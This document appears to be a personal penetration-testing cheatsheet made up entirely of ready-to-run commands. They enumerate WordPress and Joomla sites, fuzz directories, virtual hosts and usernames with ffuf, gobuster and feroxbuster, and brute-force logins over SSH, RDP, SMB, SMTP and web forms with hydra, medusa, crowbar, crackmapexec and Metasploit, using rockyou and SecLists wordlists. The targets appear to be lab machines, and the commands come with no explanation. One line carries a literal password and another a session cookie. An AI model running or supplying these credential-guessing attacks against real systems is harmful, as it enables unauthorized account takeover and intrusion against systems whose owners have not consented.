Fuzz [ cheatsheet ]

wpscan --url http://10.10.10.10 -e vp,vt,cb,dbe,u1-10 --no-banner --no-update --random-agent
wpscan --url http://10.10.10.10 --no-banner --no-update --enumerate u --detection-mode aggressive --api-token xxxxx
wpscan --url https://blogblog/ --no-banner --no-update --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://10.11.1.116:80/ --no-banner --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee -a "wpscan.txt"

hydra -e nsr -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
wpscan --url https://blogblog/ --plugins-detection aggressive

wpscan --url http://funbox.fritz.box --disable-tls-checks -u joe -P /usr/share/wordlists/rockyou.txt

msfconsole
use axiliary/scanner/http/wordpress_login_enum
PASS_FILE /usr/share/wordlists/rockyou.txt

python /opt/CMSmap/cmsmap.py http://enterprise.htb:8080 -u admin -p passwords.txt -v

msf > use auxiliary/scanner/http/joomla_bruteforce_login

joomscan -u http://10.10.10.61:8080 

nmap -p8080 --script http-joomla-brute --script-args 'userdb=names.txt,passdb=passwords.txt,http-joomla-brute.hostname=,http-joomla-brute.threads=3,brute.firstonly=true' 10.10.10.61

curl https://joomla-site/administrator/manifests/files/joomla.xml

/opt/CMSmap/cmsmap.py http://10.11.1.50 --fullscan --nosslcheck -f D

ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.34.238 -fs 2395
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.34.238 -fs 2395 -s -b "PHPSESSID=gujj6thaoru7j810441kieokjj"  

ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.110/customers/signup -mr "username already exists"

ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.110/customers/signup -mr "username already exists" -s

ffuf -w valid_usernames.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.221.110/customers/login -fc 200

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -mc 200 -fl 10
ffuf -c -w letters -u http://10.10.21.10 -H "User-Agent: FUZZ"

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt:FUZZ -u https://IP/books/FUZZ -r -recursion -recursion-depth 2 -o ffuf_scan -of all -e .php,.aspx,.txt

clobee@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

ffuf -w /usr/share/seclists/Usernames/Names/names.txt -u http://IP -X POST -H "Content-Type: application/json"  -d '{"data":"value"}' -fr "error"

gobuster dir -u http://192.168.53.205/config/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -eqz -x "txt,html,php,asp,aspx,jsp,sql,md,xml,yml,yaml,js"

gobuster dir -u https://10.11.1.237/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -eqz -k
gobuster dir -u http://192.168.0.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php
gobuster dir --proxy socks5://127.0.0.1:5000 -w /usr/share/xxx -k -u https://10.10.10.1 -n

gobuster vhost --url http://thetoppers.htb --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster dns --domain example.com --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

feroxbuster --url http://exam.seventeen.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --silent -t 16 -r -f --smart

feroxbuster -u http://10.11.1.116:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e

rm -f hydra.restore; export HYDRA_PROXY_HTTP=http://127.0.0.1:8080

hydra -e nsr -P <wordlist> -v <ip> <protocol>
hydra -e nsr -t 16 -l neil -P /usr/share/wordlists/rockyou.txt -vV 10.10.129.236 ssh
hydra -e nsr -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "hydra.txt" ssh://10.11.1.116
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "medusa.txt" -M ssh -h 10.11.1.116
hydra -e nsr -t 10 -V -L users_10.11.1.20.txt -P passwords.txt rdp://10.11.1.21

hydra -S -e nsr -L generated_users.txt -P /usr/share/wordlists/fasttrack.txt -s 443 IP https-form-post '/something/login:password=^PASS^&username=^USER^:S=302'

hydra smtp-enum://192.168.186.63:25/vrfy -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" 2>&1

hydra -l offsec -P /usr/share/wordlists/rockyou.txt -f 192.168.24.52 http-get

hydra -l leo -P /usr/share/wordlists/rockyou.txt "http-post-form://www.insanityhosting.vm/webmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."

hydra -e nsr -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol> -vV
crackmapexec smb 172.31.3.9 -u users.txt -p users.txt --continue-on-success

medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "medusa.txt" -M http -h 10.11.1.116 -m DIR:/path/to/auth/area

medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "medusa.txt" -M web-form -h 10.11.1.116 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"

hydra -e nsr -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>

hydra -e nsr -L people.txt -P /usr/share/wordlists/rockyou.txt ssh://172.16.64.166:2222 -vV -I

hydra -e nsr -l jack -P /usr/share/wordlists/rockyou.txt 10.10.59.209 -s 2222 ssh

hydra -e nsr -l "Log+In" -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-form-post '/db/index.php:password=^PASS^&remember=yes&login=^USER^&proc_login=true:F=Incorrect password.' -vV

hydra -e nsr -l jack -p "u?WtKSraq" 10.10.59.209 http-form-post '/recovery.php:user=^USER^&pass=^PASS^&submit=Submit:F=failed' -vV

hydra -e nsr -l natalya -P /usr/share/wordlists/rockyou.txt 10.10.84.32 http-get "/sev-home/"


hydra -e nsr -L "Log+In" -p '' 192.168.196.238 https-form-post '/session_login.cgi:pass=^PASS^&user=^USER^:F=Incorrect password.' -s 10000 -vV

sudo apt install crowbar
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

hydra -e nsr -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

hydra -e nsr -v -V -l "[email protected]" -P "/usr/share/wordlists/rockyou.txt" -s 80 10.10.11.120 http-post-form "/api/user/login:{\"email\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=Password is wrong:H=Accept: application/json, text/plain, */*:H=Accept-Language: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate"

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"